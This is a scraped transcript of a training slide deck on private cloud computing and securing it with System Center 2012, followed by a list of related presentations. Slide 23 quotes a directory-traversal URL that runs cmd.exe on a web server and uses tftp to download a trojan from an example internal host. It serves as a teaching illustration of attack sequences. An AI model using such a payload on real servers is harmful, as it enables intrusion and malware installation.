Presentation is loading. Please wait.

Presentation is loading. Please wait.

Securing The Cloud What is the Cloud? How do you lock it down? Kevin King - Senior Technical Instructor ● Infrastructructure/Cloud Consulting | MCT CCSI.

Published byPeregrine Manning Modified over 9 years ago

Similar presentations

Presentation on theme: "Securing The Cloud What is the Cloud? How do you lock it down? Kevin King - Senior Technical Instructor ● Infrastructructure/Cloud Consulting | MCT CCSI."— Presentation transcript:

1 Securing The Cloud What is the Cloud? How do you lock it down? Kevin King - Senior Technical Instructor ● Infrastructructure/Cloud Consulting | MCT CCSI MCSE-Private Cloud MCSA MCSA-Server 2012 MCSE CCNA Data Center Cisco Quality Instructor 2014 New Horizons CLC| 6700 Jefferson, Building A | Albuquerque, NM 87109 p: 505.830.7100 |f: 505.830.2239 | kking@nhabq.com | www.nhabq.com Kevin King - Senior Technical Instructor ● Infrastructructure/Cloud Consulting | MCT CCSI MCSE-Private Cloud MCSA MCSA-Server 2012 MCSE CCNA Data Center Cisco Quality Instructor 2014 New Horizons CLC| 6700 Jefferson, Building A | Albuquerque, NM 87109 p: 505.830.7100 |f: 505.830.2239 | kking@nhabq.com | www.nhabq.com

2 1. Introduction to the Private Cloud 2. Securing the Private Cloud

3 Overview Overview of the Cloud Computing Model Requirements for the Private Cloud Operating a Private Cloud Infrastructure with System Center Securing the Cloud

4 1) Overview of the Cloud Computing Model The Advent of Cloud Computing Public vs. Private Clouds Cloud Service Models Methods to Implement the Private Cloud System Center 2012 and the Private Cloud

5 The Advent of Cloud Computing Advantages of cloud computing include: Virtualized data center Reduced operational costs Server consolidation Improved resiliency and agility Client/Server Architecture Cloud Computing

6 Public vs. Private Clouds Private cloud : Provides more control Is flexible Is customizable Has operational and management costs Public cloud : Provides less control Provides less flexibility Provides less customization Reduced operational and management costs

7

8 The three cloud service models are: Cloud Service Models Software as a Service (SaaS) Includes business processes and applications Platform as a Service (PaaS) Includes application execution services Infrastructure as a Service (IaaS) Includes server, storage, and network infrastructure

9 Methods to Implement the Private Cloud High LowDeployment Time Low High Level of Pre-integration Custom Reference Architecture Service Provider

10 System Center 2012 and the Private Cloud System Center 2012 has the following components: App Controller Service Manager Virtual Machine Manager (VMM) Orchestrator Operations Manager Data Protection Manager (DPM) Configuration Manager

11 2) Requirements for the Private Cloud Key Business Requirements Service Identification and Onboarding Datacenter Administrators and Business Unit IT Administrators

12 Key Business Requirements The key business requirements include : Competitive advantage Scalability Reduced cost

13 Service Identification and Onboarding Service Identification: Does the application need to reside in the same location as the data? What computer resources are required? What are the software or operating system requirements? What network bandwidth will be required by the application between the users and the cloud? Onboarding: Has the service passed the identity check and is it ready for the cloud? Have relevant backups taken place? Has the migration been tested successfully in a pre-production or UAT environment? Is there a documented method for fallback?

14 Datacenter Administrators and Business Unit IT Administrators The datacenter administrator: Manages the physical infrastructure Manages the private cloud resources Datacenter Administrator Configures access to cloud resources The business unit IT administrator: Manages the business unit cloud Manages resources specific to the business unit cloud that they own Business Unit IT Administrator

15 3) Operating a Private Cloud Infrastructure with System Center Provisioning the Private Cloud with Virtual Machine Manager Managing Public and Private Clouds with App Controller Service Management with Service Manager Automating Data Center Processes with Orchestrator

16 A simple private cloud is created in Virtual Machine Manager by using the Create Cloud Wizard: Provisioning the Private Cloud with Virtual Machine Manager

17 Managing Public and Private Clouds with App Controller Using the App Controller Portal, you can manage private clouds that were created with VMM and public clouds that were created on the Windows Azure platform

18 Service Management with Service Manager Service Manager delivers an integrated platform for automating and adapting IT service management best practices to your organization's requirements By using Service Manager, you can: Reduce mean time to resolution of issues through a self-service user experience Improve private cloud efficiency through centralized management of change processes Provide self-service provisioning of private cloud resources Implement compliance controls for the management of the private cloud infrastructure

19 Automating Data Center Processes with Orchestrator Orchestrator provides a workflow management solution for the data center that allows you to automate the creation, monitoring, and deployment of resources in your environment By using Orchestrator, you can: Automate processes in your private cloud I mprove operational efficiency Connect different systems from different vendors without the knowledge of scripting languages

20 4) Securing the Private Cloud Old days – security = planting two firewalls Today – security = very complex problem

21 Types of Attacks Including, but not limited to: Packet sniffing— An application that uses the promiscuous mode of the network adapter to capture all networks packets. IP spoofing— An attack in which a hacker assumes an IP address of others to conceal its true identity Denial-of-service (DoS) attack— Aims to overwhelm a service so as to deny legitimate requests from being serviced. The service may be in the form of bandwidth, memory, or CPU. It is the most well-known of all Internet attacks, and efforts should be invested in understanding its mechanisms. Some of the more famous DoS attacks include the following: Code Red Blaster Ping of Death Trinity

22 Types of attacks Password attack— As its name implies, this attack intends to acquire passwords to important assets so as to cause further damage. Password attacks can be achieved through other methods previously mentioned, such as IP spoofing, or they can be achieved via brute force Man-in-the-middle attack— This type of attack happens when a hacker manages to position himself between the source and the destination of a network transaction. ARP cache poisoning is one common method Application attack— This type of attack happens when application software holes are exploited to gain access to a computer system. The holes may be bugs or may be TCP port numbers that are exposed Port redirection attack— This type of attack makes use of a compromised host to gain access to a network that is otherwise protected Blue Pilling

23 Sequence of attacks After a phase of probing/scanning, the hacker detects the vulnerability of the web/application server The hacker exploits the vulnerability to get a shell For example: Copy the Trojan on the web/application server: HTTPS://www.example.com/scripts/..%c0%af../winnt/syst em32/cmd.exe?/c+tftp%20- i%2010.20.15.15%20GET%20trojan.exe%20trojan.exe

24 Server Farm Security Strategies

25 Segmenting the Server Farm

26 Building the Firewall Ruleset

27 From Physical Separation to Logical Separation

28 Securing The Cloud System Center 2012 has the following components: App Controller Service Manager Virtual Machine Manager (VMM) Orchestrator Operations Manager Data Protection Manager (DPM) Configuration Manager

29 SURFACEAREA

30 Public vs. Private Clouds Physical: Physical access to equipment OOB Management Password Policy Host Security Logical : System Center Components Individual VMs Services and Apps Passwords/Encryption/Least Privledge

31

Download ppt "Securing The Cloud What is the Cloud? How do you lock it down? Kevin King - Senior Technical Instructor ● Infrastructructure/Cloud Consulting | MCT CCSI."

Similar presentations

Cloud computing is used to describe a variety of computing concepts that involve a large number of computers connected through a real-time communication.

Cloud computing is used to describe a variety of computing concepts that involve a large number of computers connected through a real-time communication.
System Center 2012 R2 Overview

System Center 2012 R2 Overview
The Microsoft Cloud Azure Platform This presentation incorporates some content from Microsoft.

The Microsoft Cloud Azure Platform This presentation incorporates some content from Microsoft.
Cisco and NetApp Confidential. Distributed under non-disclosure only. Name Date FlexPod Entry-level Solution FlexPod Value, Sized Right for Smaller Workloads.

Cisco and NetApp Confidential. Distributed under non-disclosure only. Name Date FlexPod Entry-level Solution FlexPod Value, Sized Right for Smaller Workloads.
Hacker, Cracker?! Are they the same? No!!! Hacker programmers intensely interested in the arcane and recondite workings of any computer operating system.

Hacker, Cracker?! Are they the same? No!!! Hacker programmers intensely interested in the arcane and recondite workings of any computer operating system.
Security Issues and Challenges in Cloud Computing

Security Issues and Challenges in Cloud Computing
Unified Logs and Reporting for Hybrid Centralized Management

Unified Logs and Reporting for Hybrid Centralized Management
BETA!BETA! Building a secure private cloud on Microsoft technologies Private cloud security concerns Security & compliance in a Microsoft private cloud.

BETA!BETA! Building a secure private cloud on Microsoft technologies Private cloud security concerns Security & compliance in a Microsoft private cloud.
Asper School of Business University of Manitoba Systems Analysis & Design Instructor: Bob Travica System architectures Updated: November 2014.

Asper School of Business University of Manitoba Systems Analysis & Design Instructor: Bob Travica System architectures Updated: November 2014.
© 2009 IBM Corporation ® IBM Software Group Introduction to Cloud Computing Vivek C Agarwal IBM India Software Labs.

© 2009 IBM Corporation ® IBM Software Group Introduction to Cloud Computing Vivek C Agarwal IBM India Software Labs.
Presented by Sujit Tilak. Evolution of Client/Server Architecture Clients & Server on different computer systems Local Area Network for Server and Client.

Presented by Sujit Tilak. Evolution of Client/Server Architecture Clients & Server on different computer systems Local Area Network for Server and Client.
M.A.Doman 2011. Model for enabling the delivery of computing as a SERVICE.

M.A.Doman Model for enabling the delivery of computing as a SERVICE.
Microsoft Virtual Academy Module 4 Creating and Configuring Virtual Machine Networks.

Microsoft Virtual Academy Module 4 Creating and Configuring Virtual Machine Networks.
Cost Effort Complexity Benefit Cloud Hosted Low Cost Agile Integrated Fully Supported.

Cost Effort Complexity Benefit Cloud Hosted Low Cost Agile Integrated Fully Supported.
The Changing Datacenter – Understanding the Hybrid Cloud Opportunity Kristian Wares, Datacentre Solution Sales Specialist Nick Ward, Cloud Solution Sales.

The Changing Datacenter – Understanding the Hybrid Cloud Opportunity Kristian Wares, Datacentre Solution Sales Specialist Nick Ward, Cloud Solution Sales.
Cloud Attributes Business Challenges Influence Your IT Solutions Business to IT Conversation Microsoft is Changing too Supporting System Center In House.

Cloud Attributes Business Challenges Influence Your IT Solutions Business to IT Conversation Microsoft is Changing too Supporting System Center In House.
Cliff Evans Management Lead Microsoft UK System Center Overview.

Cliff Evans Management Lead Microsoft UK System Center Overview.
System Center 2012 Setup The components of system center App Controller Data Protection Manager Operations Manager Orchestrator Service.

System Center 2012 Setup The components of system center App Controller Data Protection Manager Operations Manager Orchestrator Service.
Data Center Network Redesign using SDN

Data Center Network Redesign using SDN
Real Security for Server Virtualization Rajiv Motwani 2 nd October 2010.

Real Security for Server Virtualization Rajiv Motwani 2 nd October 2010.

Similar presentations

Ads by Google